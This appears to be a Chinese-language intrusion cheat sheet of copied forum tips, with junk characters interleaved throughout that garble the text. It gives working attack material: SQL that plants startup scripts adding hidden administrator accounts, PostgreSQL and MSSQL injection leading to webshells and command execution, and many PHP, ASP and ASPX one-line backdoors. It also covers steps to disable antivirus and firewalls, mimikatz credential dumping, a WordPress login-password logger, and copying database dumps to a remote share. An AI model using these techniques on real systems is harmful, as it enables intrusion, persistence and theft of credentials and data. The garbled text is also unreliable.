insert into a values ("set wshshell=createobject (""wscript.shell"") " );2 P# r9 R% z8 w6 @. `
insert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );! p2 M% S6 `( X% [
insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );
2 ]/ u; [, S* {3 ?: b4 {5 H1 Lselect * from a into outfile "C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动\\a.vbs";
+ j) C% U% I; ~! Odrop table a;3 _5 ]% y3 ~) U& B
' H1 t) n& S# U2 d4 d5 h
英文版本:7 ~! H1 C2 W. w: R. d5 E3 `# ~
+ R" g. G/ M s# h" S4 d8 E, X+ Vuse test;
1 G$ g- D4 D" x( o) w6 zcreate table a (cmd text);
2 o$ s! W4 Y5 u% y) E ^1 pinsert into a values ("set wshshell=createobject (""wscript.shell"") " );% L! _7 Q$ Q6 N* Q y U0 Y v
insert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );
% t; F2 A3 `& Uinsert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );
! `* B% X2 p% F' J- J; y! z* Dselect * from a into outfile "C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\a.vbs";
T& S# I, m$ X: gdrop table a;
9 c# }3 y% ^# v1 W& K$ X
2 {5 y9 _1 L& m% Y, Zcreate table a (cmd BLOB);) j7 g- z( T1 D
insert into a values (CONVERT(木马的16进制代码,CHAR));9 P; }- |" m8 G
select * from a into dumpfile 'C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\启动\\mm.exe'0 ^/ n \; a- X$ h& r D0 R8 C" X
drop table a;
* V' ^6 g# ^' N" }: f% b/ y
4 P* @1 r2 q; L记录一下怎么处理变态诺顿, i% _% M# Z5 N: {
查看诺顿服务的路径
" T' m m; K0 b2 F4 V1 {, Isc qc ccSetMgr" G: F* P2 G3 ^
然后设置权限拒绝访问。做绝一点。。
+ |% z7 _ D# k0 n4 T6 icacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d system9 s7 k/ `9 x+ }3 Q) Q5 {) r
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d "CREATOR OWNER"
% G" _4 {' O" C, e+ j9 ~/ G8 _cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d administrators; a0 m1 S4 y7 S( Z) l* Q
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d everyone) c4 E7 E: @( L" b5 [) Z6 P
% [1 n2 R+ |/ S: v6 H6 [) N9 _' n然后再重启服务器1 N; k; e( F! m" y# }- \& ~
iisreset /reboot
9 B, B: A! a" T2 X这样就搞定了。。不过完事后。记得恢复权限。。。。
+ p6 E/ A* b$ Z8 Z$ J; bcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G system:F
+ R P3 s ? c4 H* \* G4 Hcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G "CREATOR OWNER":F
* g# ~8 f6 p' I( J2 pcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G administrators:F! P9 ]7 V5 p/ B' |" v r
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G everyone:F* o) a2 W( ]) @9 x( s& b
SELECT '<%eval(request(chr(35)))%>' into [fuck] in 'E:\asp.asp;fuck.xls' 'EXCEL 4.0;' from admin
% G+ O( r# C: `+ `) a: ?9 |
+ H) k, V* F2 C6 mEXEC('ma'+'ster..x'+'p_cm'+'dsh'+'ell ''net user''')5 b+ J% w C4 c( ~% u( N, _
0 A; h6 Y6 D9 {$ n" h4 e3 Xpostgresql注射的一些东西
& H R1 _( M5 |( e. D! G* M如何获得webshell* h0 u% ~" \; X
http://127.0.0.1/postgresql.php?id=1;create%20table%20fuck(shit%20text%20not%20null);
1 n+ N: r. O7 C$ Mhttp://127.0.0.1/postgresql.php?id=1;insert into fuck values($$<?php eval($_POST[cmd]);?>$$); ; p2 z# X% h! H* L3 T- v+ K1 A
http://127.0.0.1/postgresql.php?id=1;copy%20fuck(shit)%20to%20$$/tmp/test.php$$;
: o" c+ i) ?7 \7 |" `如何读文件. o* y, I$ M8 q* Z8 y5 {! G# ~
http://127.0.0.1/postgresql.php?id=1;create table myfile (input TEXT);9 T# c: C0 d# B0 |
http://127.0.0.1/postgresql.php?id=1;copy myfile from ‘/etc/passwd’;
7 U B. @0 F! l* M$ k- G/ |- K' z4 ^http://127.0.0.1/postgresql.php?id=1;select * from myfile;
* @8 R3 ~( `. L& O: u. d0 j- D, c5 a4 h) k) m1 s& Y
z执行命令有两种方式,一种是需要自定义的lic函数支持,一种是用pl/python支持的。) I+ d/ }) C. u4 D4 U
当然,这些的postgresql的数据库版本必须大于8.X
1 i8 v0 w- ]2 [! v, ]; F创建一个system的函数:
. B0 Y* s; J) y: gCREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6', 'system' LANGUAGE 'C' STRICT
" Z# R# ]5 d4 d. k7 o* K' `7 O0 ~: t: i( s v: P5 p
创建一个输出表:' [( |9 i% Q" [" E( M3 p
CREATE TABLE stdout(id serial, system_out text), U, y1 E, \+ {" e; o* Z0 c
1 K9 v u6 O* w" z
执行shell,输出到输出表内:
$ |5 h- N0 n5 k; }9 v USELECT system('uname -a > /tmp/test')
; F+ V) }5 e! H6 `* C
3 n$ ?& \( F# N0 P2 }2 ?6 |copy 输出的内容到表里面;
, K3 `( P; }% f7 aCOPY stdout(system_out) FROM '/tmp/test'9 l3 F1 g2 j- ?( c
K2 d/ E9 Y1 F# R% \从输出表内读取执行后的回显,判断是否执行成功
8 M/ A9 U% Q8 d. u" u" R( x* q l- [. s0 V1 G6 F) g" O
SELECT system_out FROM stdout
' G! o; |) h" x9 |3 @6 o% E下面是测试例子8 A2 B6 A; c$ `
0 I! C' h R/ S0 Q% D* d
/store.php?id=1; CREATE TABLE stdout(id serial, system_out text) -- ' A: H+ i( L/ p4 w
* V8 `6 t6 n7 L! c& x5 l/store.php?id=1; CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6','system' LANGUAGE 'C'1 R: I6 W; w. a' W
STRICT --
. d; T# T, w# X s6 U" D4 T1 n. R$ v6 ~* P+ H
/store.php?id=1; SELECT system('uname -a > /tmp/test') --# b8 ^& @( X) D& D* D! b
$ q0 h6 C( `- y$ [% f' I d
/store.php?id=1; COPY stdout(system_out) FROM '/tmp/test' --" S1 J4 {6 {) E' a, z- _
- U2 i9 g) V }$ e
/store.php?id=1 UNION ALL SELECT NULL,(SELECT stdout FROM system_out ORDER BY id DESC),NULL LIMIT 1 OFFSET 1--- U+ U7 l8 _! i* e
net stop sharedaccess stop the default firewall. y" ~4 |8 P" u' s% F
netsh firewall show show/config default firewall8 j: B8 p' B; K
netsh firewall set notifications disable disable the notify when the program is disabled by the default firewall8 Z$ L% S, v3 F* m6 I9 ]/ \
netsh firewall add allowedprogram c:\1.exe Svchost add the program which is allowed by default firewall
S& `$ n/ g, `0 y' K; G修改3389端口方法(修改后不易被扫出)1 o9 c7 b8 a! o7 ~5 w0 ~
修改服务器端的端口设置,注册表有2个地方需要修改
% B) W% Y' ~3 M) \) K( L" p
+ t; c0 N$ ]8 X- W/ N[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\TerminalServer\\Wds\\rdpwd\\Tds\\tcp]( w9 y# f& F1 f+ {3 b8 x! l
PortNumber值,默认是3389,修改成所希望的端口,比如60000 |0 V( d! G2 E5 ]* [
$ @; }, R5 e. _3 v# A% a第二个地方:
/ a. k0 o0 S: S- C[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp]
( y5 k' L1 ]; I4 M3 KPortNumber值,默认是3389,修改成所希望的端口,比如6000
" S- B! @3 d& P. f$ W) O
2 W9 e) S7 k: C$ b; @0 F* \现在这样就可以了。重启系统就可以了
3 {, u" M8 j' {( G4 G9 i1 d# z Z! e5 Q) C# L2 A+ v0 t* y
查看3389远程登录的脚本8 e; ?" d( _2 B
保存为一个bat文件5 l9 K3 u6 g6 H8 b( ^* e
date /t >>D:\sec\TSlog\ts.log
8 K$ }- [' Y1 t% h, x5 {$ qtime /t >>D:\sec\TSlog\ts.log8 @1 N" p# j8 D! e( r- X) p
netstat -n -p tcp | find ":3389">>D:\sec\TSlog\ts.log
5 R9 ]1 d* D3 x/ P( \start Explorer
* B: l% V/ L7 f' F- T% d: V3 T0 q
mstsc的参数:
1 _4 E7 f9 D% R6 T9 H3 f
" s8 ?# a& K5 P2 b- D远程桌面连接! I- J% F/ I! _0 Y" @9 C O0 r
; j' o( p3 F* r0 F* Z9 X
MSTSC [<Connection File>] [/v:<server[:port]>] [/console] [/f[ullscreen]]# r" Z+ i6 v$ |4 e4 ]# S
[/w:<width> /h:<height>] | /Edit"ConnectionFile" | /Migrate | /?
+ Y/ u' v3 `/ q3 E1 [+ [% e" c9 H; [8 }* P) L: c
<Connection File> -- 指定连接的 .rdp 文件的名称。! u: m+ I4 y. L' e8 G
: i* R" @% A# p7 u1 y
/v:<server[:port]> -- 指定要连接到的终端服务器。
" n3 j3 B; Y6 L; E
) x" j+ W7 O( C9 S/console -- 连接到服务器的控制台会话。
8 w- n- W4 |8 a0 M: x: P5 t& k1 }( J9 @3 l% V& F
/f -- 以全屏模式启动客户端。
; ~3 i. J7 F) f' _& U0 U7 z3 h7 }4 ~8 \* P" ]# v4 g8 t
/w:<width> -- 指定远程桌面屏幕的宽度。
m$ I# R" R& {$ O9 i, U
o- E* x! R4 k F. k% z/h:<height> -- 指定远程桌面屏幕的高度。
) \' ~ o9 _9 U: c6 U7 H1 X8 {+ e( D% }9 X
/edit -- 打开指定的 .rdp 文件来编辑。
2 |8 O4 a7 g. H2 w& l& r4 u, d8 ^; ^
/migrate -- 将客户端连接管理器创建的旧版1 y0 N. E1 l u) Y4 r% j5 I& I
连接文件迁移到新的 .rdp 连接文件。0 H* L# X& M; l8 A/ l0 H$ O( [ B
& Y9 }" i q% G, G' }" Q
3 ^9 \3 G% I( V% N p其中mstsc /console连接的是session 0,而mstsc是另外打开一个虚拟的session,这样的话就是相当与另外登陆计算机。也就是说带console参数连接的是显示器显示的桌面。大家可以试试啊,有的时候用得着的,特别是一些软件就
3 _/ B- B4 K/ Q. z4 J' D& N2 j' j/ Hmstsc /console /v:124.42.126.xxx 突破终端访问限制数量
! \8 o( Z) y" o0 b! j0 z% S3 `- ~0 I( E) @+ y2 s, ]0 T! `
命令行下开启3389( a) ?/ {* d: R! o$ W) X
net user asp.net aspnet /add6 c, h5 }3 ]) ]$ R( v7 n3 g
net localgroup Administrators asp.net /add: X: h; N. u; X i
net localgroup "Remote Desktop Users" asp.net /add
- d, `6 e% `+ M0 Eattrib +h "%SYSTEMDRIVE%\Documents and Settings\asp.net" /S /D* c& c& e o! j
echo Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t reg_dword /d 0
7 y5 r; R3 j; V. v. |echo Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v AllowTSConnections /t reg_dword /d 1
; c+ R& X) ~& t z: c8 Wecho Y | reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "asp.net" /t REG_DWORD /d 00000000 /f3 o! Q& n% i+ B8 |1 q, h, Y$ p+ W2 L
sc config rasman start= auto+ I3 a( r& }) c6 ?) l
sc config remoteaccess start= auto; w( d$ a* J; ~
net start rasman
+ c* V4 U4 G" Nnet start remoteaccess; o* G1 }: n6 V2 r4 A4 L
Media9 q2 j$ J$ B+ Y! W7 I. g
<form id="frmUpload" enctype="multipart/form-data"
7 ^& R3 C! _9 o* w5 Naction="http://www.site.com/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media" method="post">Upload a new file:<br>
, h# z' v" e1 \+ B) D; y$ U<input type="file" name="NewFile" size="50"><br>- H V( e6 e: y) F. ?& i
<input id="btnUpload" type="submit" value="Upload">) i; P4 j! T6 C! \1 C
</form>
; Q4 W/ N9 l! A6 _0 z6 V! o6 U2 @# u p& V3 U
control userpasswords2 查看用户的密码* Q: @8 Q/ a! O' a$ l* s) K* e& j
access数据库直接导出为shell,前提a表在access中存在。知道网站的真实路径
% |4 V4 v! p6 `& v$ Y7 }6 g# ]1 rSELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a
5 W6 {/ l \4 V) ?2 f6 ]- Y# n! E
* J. \# E z* m, p! \- j6 }/ o# K141、平时手工MSSQL注入的时候如果不能反弹写入,那么大多数都是把记录一条一条读出来,这样太累了,这里给出1条语句能读出所有数据:
( g4 \% F' q7 ?+ l7 n0 m测试1:
( Q% X! g3 d/ h, ZSELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t1& r4 l7 _% i, Z! ?4 H' R
; @, b4 ^9 r Y" b- M1 D) _
测试2:2 O+ u0 p5 N1 F' u
9 _+ v3 p3 E# `create table dirs(paths varchar(100),paths1 varchar(100), id int)
+ [4 Z, l4 Q4 r8 H {8 O0 z6 f- x( V+ e8 v* L
delete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--
3 F5 Y9 N: t7 J" A( _0 x. T3 G6 h" L' d; T+ \; J* |
SELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t1
$ A' S C& V6 i: }# D+ I关闭macfee软件的方法://需要system权限,请使用at或psexec –s cmd.exe命令
* N) H! X: Q' x3 v" m可以上传.com类型的文件,如nc.com来绕过macfee可执行限制;7 @* j, X) L) u8 {( I! c
net stop mcafeeframework
( @7 S0 ?- {, J5 Rnet stop mcshield
0 ?2 y4 H0 Q7 enet stop mcafeeengineservice; F4 z0 P' x& H4 g' c
net stop mctaskmanager/ G2 x$ |) X+ ]; C2 O9 J
http://www.antian365.com/forum.p ... DU5Nzl8NDY5Mw%3D%3D1 l8 ?8 q0 ?7 G) n
+ s* j( R. {& ?! R! E% s
VNCDump.zip (4.76 KB, 下载次数: 1) ' \" d' Q9 a3 n
密码在线破解http://tools88.com/safe/vnc.php
8 ]+ M8 p; \7 t( _VNC密码可以通过vncdump 直接获取,通过dos查询[HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4] 下的Password也可以获取4 X$ O h$ N' L' F
+ p, B; D- `- S6 q( s4 E
exec master..xp_cmdshell 'net user'
0 T- `2 Z/ T5 U( U! w* J b: d% qmssql执行命令。# q! d& ]2 g& X% v, i
获取mssql的密码hash查询/ \& ]6 x8 E! I$ o0 p& D& |
select name,password from master.dbo.sysxlogins8 p0 D& e7 [( J9 i. z. J0 `8 k4 |
3 W' x6 \3 W s w( g% ^& x' e
backup log dbName with NO_LOG;# q' y2 I, P9 p! z( f8 {
backup log dbName with TRUNCATE_ONLY;" ^1 Q# G' x# Y
DBCC SHRINKDATABASE(dbName);+ Z0 I$ P' G7 \# Y- J, b: i. X
mssql数据库压缩# l6 k5 J. Q7 O* f# \" z: B
4 [! v, g# T. y# W+ vRar.exe a -ep1 -m0 -v200m E:\web\1.rar E:\webbackup\game_db_201107170400.BAK* a4 y& D- c; f& P: g9 K7 l/ L
将game_db_201107170400.BAK文件压缩为1.rar,大小为200M的分卷文件。
& k; W5 [ w) Y. V4 a& G) f; n/ v; l8 A$ H8 a% q3 \* }! a) s
backup database game to disk='D:\WebSites\game.com\UpFileList\game.bak'1 D/ n* {) s' ^ i( ~
备份game数据库为game.bak,路径为D:\WebSites\game.com\UpFileList\game.bak/ S/ {+ _0 u) H6 r! ]
( i& O5 C0 _8 f) l. ^+ M& \
Discuz!nt35渗透要点:
& [! A& \3 K- Q. a6 c(1)访问 网站地址/admin/global/global_templatesedit.aspx?path=../tools/&filename=rss.aspx&templateid=1&templatename=Default- ]* I2 Q4 a+ U3 c6 I1 C
(2)打开rss.aspx文件,将<%@ Page Inherits="Discuz.Web.UI.RssPage" %>复制到本地备份,然后替换其为<%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%> a' |6 U- H$ R0 p
(3)保存。
" ^6 J$ P4 |2 E, P: [7 Y/ I(4)一句话后门地址http://somesite.com.cn/tools/rss.aspx 密码为pass
: _& S% K1 t7 V4 |7 S1 X9 e' S; Dd:\rar.exe a -r d:\1.rar d:\website\- u3 I. t6 N1 T' x1 l8 e3 R
递归压缩website
) r+ |- s6 w# u0 c注意rar.exe的路径$ ~: p/ l: B7 K' _* `
- S+ t) T2 x R8 U% i- V7 k, H
<?php [' g3 A8 S) m: E- Q- j
9 E9 {+ E6 }; _
$telok = "0${@eval($_POST[xxoo])}";
2 H0 p# m$ o2 J& b8 N. z8 @" {8 [, p3 h
$username = "123456";1 f6 [+ b; ]7 \$ V$ b& G w7 a4 t
1 W. g% Z8 h+ F. J+ f
$userpwd = "123456";
+ g2 U5 Q1 @& V! ] |; t$ P) \6 `' J7 Y; f3 N* y' W
$telhao = "123456";
" |3 a( Y1 _ d
- _0 D# ?, v9 |& G7 D( d$telinfo = "123456";+ q% k2 V* V4 m
4 ?* K; ?9 u, a?>
$ R9 l2 k. I7 k# V+ Tphp一句话未过滤插入一句话木马( u! ?. _" V( W _
O7 ]( l' r5 M, u7 Y9 E站库分离脱裤技巧" ^" }1 C5 v3 |4 n/ R
exec master..xp_cmdshell 'net use \\xx.xx.xx.xx\d$\test "pass" /user:"user"'- s' I( }$ g: i3 h% n
exec master..xp_cmdshell 'bcp test.dbo.test out \\xx.xx.xx.xx\d$\test\1.txt -c -Slocalhost -Uuser -Ppass'" e5 p' ]7 D. }. [( ~0 p
条件限制写不了大马,只有一个一句话,其实要实现什么完全够了,只是很不直观方便啊,比如tuo库。( t- ~1 ^* H: @, b! Q
这儿利用的是马儿的专家模式(自己写代码)。0 p+ J9 ]1 w- V7 j" |. C6 Y1 z$ w; u
ini_set('display_errors', 1);" X" |. b, D/ Y4 C. E- q' j
set_time_limit(0);
; i0 z' V& a. G* b5 i' q5 g. nerror_reporting(E_ALL);
e/ W/ c- T( N3 F6 z* J$connx = mysql_connect(":/var/tmp/mysql.sock", "forum", "xx!!xx3") or die("Could not connect: " . mysql_error());2 m& o1 S! e- `1 E# `9 ~; \$ }
mysql_select_db("discuz",$connx) or die("Could not connect: " . mysql_error());6 a B3 ? j) O* c/ L
$result = mysql_query("Select * FROM members",$connx) or die("Could not connect: " . mysql_error());
- _4 [) ?3 e) K, A2 U; C4 j$i = 0;5 j; B& W# P. G* c C/ W
$tmp = '';3 T3 t1 |# _" H6 _' `) V' C
while ($row = mysql_fetch_array($result, MYSQL_NUM)) {. J" O( T" p5 J
$i = $i+1;
. U3 \- D0 [- z. l/ N. I $tmp .= implode("::", $row)."\n";
7 c2 w+ ~8 U* D u if(!($i%500)){//500条写入一个文件
- A1 i; W- W5 ?& ` $filename = '/home/httpd/bbs.xxxxx/forumdata/cache/user'.intval($i/500).'.txt';' y, A9 G+ O8 w/ G% ^
file_put_contents($filename,$tmp);
: u, k2 F3 Z0 Y# ^, d% V' g# p, H$ A, z $tmp = '';
3 W$ _- X: [: Q j2 t! U6 |& q) f }7 D2 h A2 k' \: Q( T
}1 Z$ I4 O- O' F v7 d
mysql_free_result($result);
8 u* T2 n3 K6 b2 N% |. t) a( b/ a. n* x- x
: s8 Z% @2 L, f* g; |+ J/ G" u& R7 X) A' S- h' s/ `
//down完后delete. N" h0 f9 u' |$ c/ c
8 _$ q/ ^6 |, `( M
# `4 F) x, U$ a6 S$ a
ini_set('display_errors', 1);
$ Q; q1 [& K0 @3 _9 }error_reporting(E_ALL); T( Q' V: {7 `) m6 Q2 \/ b
$i = 0;
6 P, s- n+ @9 M. g; G7 R S2 Z) mwhile($i<32) {6 Z$ l0 |7 H) T4 w; w' M3 ~
$i = $i+1;" @# ~7 N$ L9 j* O
$filename = '/home/httpd/bbs.xxxx/forumdata/cache/user'.$i.'.txt';
$ Q- S/ F. D+ T unlink($filename);
* Q6 ~# j& s0 |}
B& K0 b) f8 Uhttprint 收集操作系统指纹( _" M7 j7 K5 m3 }- t9 c* B
扫描192.168.1.100的所有端口
8 t7 p' f$ w$ u: c/ ^nmap –PN –sT –sV –p0-65535 192.168.1.100
: \6 R. I3 a+ w8 u3 Ghost -t ns www.owasp.org 识别的名称服务器,获取dns信息
- s* _$ {! J. ?7 i* g- [host -l www.owasp.org ns1.secure.net 可以尝试请求用于owasp.org的区域传输9 ?' h& J( A# x2 z3 o1 N
Netcraft的DNS搜索服务,地址http://searchdns.netcraft.com/?host7 p/ _0 s7 k7 v3 X$ h: Y, f- ]
$ f$ \3 t: O$ ~$ {& Z: s$ u3 F
Domain tools reverse IP: http://www.domaintools.com/reverse-ip/ (需要免费注册)7 J5 F0 j v6 z! r$ I
, s$ p; q7 ]( T( L. P5 E- r# W4 j
MSN search: http://search.msn.com 语法: "ip:x.x.x.x" (没有引号)% P$ V1 U" o: V9 h& i) a
$ E- z) F5 ?! Z. v0 k& W
Webhosting info: http://whois.webhosting.info/ 语法: http://whois.webhosting.info/x.x.x.x$ B* M$ G5 ^! k
# ^% y- F1 m6 V5 a( J4 ~$ K DNSstuff: http://www.dnsstuff.com/ (有多种服务可用)
/ ]% k& Q; ]4 R; O/ N3 P* t
8 {6 e' \& E0 K, C http://net-square.com/msnpawn/index.shtml (要求安装)
: q: c: w) o# P7 a9 j+ u) @& s! r, N& [. x" B9 q
tomDNS: http://www.tomdns.net/ (一些服务仍然是非公开的)# y& I' m7 z* {- d% G6 ?; P
9 J9 @; ]- s2 Q3 p; z0 D5 x SEOlogs.com: http://www.seologs.com/ip-domains.html (反向IP/域名查找)
- e1 o& w) F! E3 aset names gb2312
8 q3 G/ b" L8 _; Z, H导入数据库显示“Data too long for column 'username' at row 1”错误。原因是不支持中文。
( {) U7 `( \$ u5 l6 Y: T0 i9 k( t( H+ e3 N8 y$ y
mysql 密码修改
5 A" M9 T& y+ j4 _2 v; w3 u+ QUPDATE mysql.user SET password=PASSWORD("newpass") whereuser="mysqladmin ”
9 n, U( G' P3 \8 K0 Z. y& L9 tupdate user set password=PASSWORD('antian365.com') where user='root';4 q' @: L1 G+ X+ t" H0 B# E
flush privileges;
9 ]* b5 a! `5 }, e6 c( ^高级的PHP一句话木马后门
5 [ F! Q; x/ L& l
! k6 d- }2 g5 l7 i) d& j入侵过程发现很多高级的PHP一句话木马。记录下来,以后可以根据关键字查杀
7 V' O4 ?" t, ~+ k+ Q! ?: l4 b& d- l. r
1、) W6 ^: V! g X! Q( u: Y
/ T+ X y" A( `# d2 v$hh = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";
/ g9 F, Z' L0 Y, g4 Y, K [
- G# @- u ~4 ]& ?- P$hh("/[discuz]/e",$_POST['h'],"Access");. V8 Z; A$ }' u* a+ i" }
- E& \+ w5 \. P' Q s- ~//菜刀一句话% y0 Y0 p+ r* T" u1 V( {
( n2 a* [2 m& S& o1 F
2、7 Q1 f5 s9 T1 Z: l+ h: i, a8 _
3 P/ a. ~5 q" |5 N
$filename=$_GET['xbid'];
4 h8 h3 A* D. ^
5 o2 C- a5 w! X; c6 [2 o' G4 d( rinclude ($filename);" \3 q4 Z- M' F E* J) N8 V
. ? D! \5 a6 v& }7 v//危险的include函数,直接编译任何文件为php格式运行' M9 X) N: e- [5 [- h" f# I! P
5 u" c: w0 J$ s3、% e- m! o- i. |9 |
+ k- {1 c' {. A# T) r3 f
$reg="c"."o"."p"."y";
; Q7 ]* ?. b3 x$ W5 n. g$ ]7 t+ N! {3 M% w2 c' D
$reg($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]);
! x( w- _- T- {
0 ^; w, r' z3 ^9 |# M//重命名任何文件
4 q8 f* U2 x4 m/ ^# W# Y# a
7 D8 i- H6 s: C* v4、
, e& t) p( N D7 m; Q, V
7 `3 }0 l8 \ Q& b+ b$gzid = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";* |' ?# \6 |5 I. @7 L* R2 n! }) v
4 Y# i/ i# e9 X( f$ R) {( }
$gzid("/[discuz]/e",$_POST['h'],"Access");
* E0 B2 ^* Q3 c+ h! W; o: W& s+ N# Q
//菜刀一句话* j _2 v0 |8 \ A3 u4 A- a
0 ]$ ~" E. f, ~' s1 X
5、include ($uid);
2 i8 t$ e6 y0 e/ B# H3 F6 r# B; h3 j
//危险的include函数,直接编译任何文件为php格式运行,POST ! k* F' |6 ?# S& C' g6 s
6 M( M B' @5 ]% N+ j" p, n4 z: H% J" f/ ?4 [& f
//gif插一句话& x. b* H' K: W% [0 w
) [; e2 N! w4 N& d: P' \6、典型一句话) `: p& [8 L2 m" w$ i
, U8 B* A# X- D+ D! I* \# R
程序后门代码) Z% A0 X( Q) C% b# ^
<?php eval_r($_POST[sb])?>
3 l# P3 @5 v: U* Z) ~, y: @程序代码
0 G! `3 A" c+ F% c<?php @eval_r($_POST[sb])?>
* w# @& ~. J' G$ U//容错代码/ n# {7 E* Q# ?) F E- R9 m$ M
程序代码
# m7 Z' X: n8 R) O<?php assert($_POST[sb]);?># g L0 B- X$ T- ?
//使用lanker一句话客户端的专家模式执行相关的php语句
$ J# a! M0 v' u程序代码
; ~9 C% \, @! f1 c! _1 B6 W<?$_POST['sa']($_POST['sb']);?>
# U. f9 W$ A' v- W1 h2 _1 E' k程序代码
1 [ Y) z6 Q, Q& {3 u; @+ @8 W<?$_POST['sa']($_POST['sb'],$_POST['sc'])?>/ Q! V( @' _' _1 G/ R9 Y
程序代码
4 g5 Z! [/ ^5 }1 N9 H8 c9 \<?php6 F2 P4 f* x9 E
@preg_replace("/[email]/e",$_POST['h'],"error"); {1 I4 `+ x" s9 u) g* b
?>" g: X1 H' x, e! G s# e( U' J
//使用这个后,使用菜刀一句话客户端在配置连接的时候在"配置"一栏输入
k5 V( K x5 m. p: l X, {. l程序代码) I6 T& d7 x( d
<O>h=@eval_r($_POST[c]);</O>
1 E4 N! b3 u& V' C程序代码
. _; N h9 p/ b3 ^8 E3 I" a! w<script language="php">@eval_r($_POST[sb])</script>
1 U1 W" K+ n C& i+ H9 z//绕过<?限制的一句话
7 U. u* U0 R' L6 r
5 q; \ N. B9 i5 j2 I& ehttp://blog.gentilkiwi.com/downloads/mimikatz_trunk.zip" I4 S0 E8 @1 H" f, E
详细用法:
1 q% X" z6 U9 w9 }2 m1、到tools目录。psexec \\127.0.0.1 cmd
1 I3 w& ?+ I7 W4 f) f2、执行mimikatz0 L& b0 f8 A8 P* ]1 A
3、执行 privilege::debug( M) s! L; B" Q% I
4、执行 inject::process lsass.exe sekurlsa.dll+ p' y% C+ ]* w/ U! y
5、执行@getLogonPasswords: b; c0 B7 y2 D- ~
6、widget就是密码
# q: @8 S2 R4 W# t" _, S7、exit退出,不要直接关闭否则系统会崩溃。
" ~0 w W/ i% m0 Z% X" i
: t0 I3 F* F5 `& lhttp://www.monyer.com/demo/monyerjs/ js解码网站比较全面
/ n) i- s# ^* g3 B5 w- H, k% |' g1 T8 l
自动查找系统高危补丁
f" G6 u M2 y, b' J' {8 ksysteminfo>a.txt&(for %i in (KB2360937 KB2478960 KB2507938 KB2566454 KB2646524 KB2645640 KB2641653 KB944653 KB952004 KB971657 KB2620712 KB2393802 kb942831 KB2503665 KB2592799) do @type a.txt|@find /i "%i"||@echo %i Not Installed!)&del /f /q /a a.txt0 L! ~7 u3 o8 ~
) o' `$ |# j- ~2 k突破安全狗的一句话aspx后门
* v$ n; D# F" P<%@ Page Language="C#" ValidateRequest="false" %>1 z/ L8 m! T5 R
<%try{ System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["你的密码"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null, null); } catch { }%>
# N- a5 i( U; Owebshell下记录WordPress登陆密码
. a) d; ?7 b' c' Xwebshell下记录Wordpress登陆密码方便进一步社工
. T8 o7 }' R( b3 t* Q7 [ C: E在文件wp-login.php中539行处添加: _2 b' C0 _0 u! f- ~6 L$ v3 C9 m
// log password) q+ v3 [/ k* w% M4 Q
$log_user=$_POST['log'];
" H1 ^& V$ q9 v' e, o$log_pwd=$_POST['pwd'];) D/ T, k e4 d. r
$log_ip=$_SERVER["REMOTE_ADDR"];) Z9 E3 ^0 R) M& L
$txt=$log_user.’|’.$log_pwd.’|’.$log_ip;3 U$ h" g2 Q9 i. J1 ~5 w
$txt=$txt.”\r\n”;
5 D m9 J1 f/ K' D0 Wif($log_user&&$log_pwd&&$log_ip){* z1 _8 {* ]6 [
@fwrite(fopen(‘pwd.txt’,”a+”),$txt);; d7 R, c. f% J6 S
}0 K! R% D: `+ D' `# x9 [
当action=login的时候会触发记录密码code,当然了你也可以在switch…case..语句中的default中写该代码。' V0 q& k# o* X* R) N9 M f
就是搜索case ‘login’
0 ^/ u& Y0 ~; h在它下面直接插入即可,记录的密码生成在pwd.txt中,) {2 [. G5 L0 k9 s
其实修改wp-login.php不是个好办法。容易被发现,还有其他的方法的,做个记录
# V; w& Z! U/ H G% m4 D利用II6文件解析漏洞绕过安全狗代码:
, [4 w; @* R- |2 i! P;antian365.asp;antian365.jpg
' |& A7 b; w$ C% y. i" f% M
# H& @& J+ P! K0 W各种类型数据库抓HASH破解最高权限密码!
& K; D2 Y A6 f4 h- [9 {- _3 N1.sql server2000$ t: T4 m. Q# E9 c% S
SELECT password from master.dbo.sysxlogins where name='sa'
6 i1 \8 e7 v- F# ?0×010034767D5C0CFA5FDCA28C4A56085E65E882E71CB0ED250341( n/ N* T) L. ]6 F: E
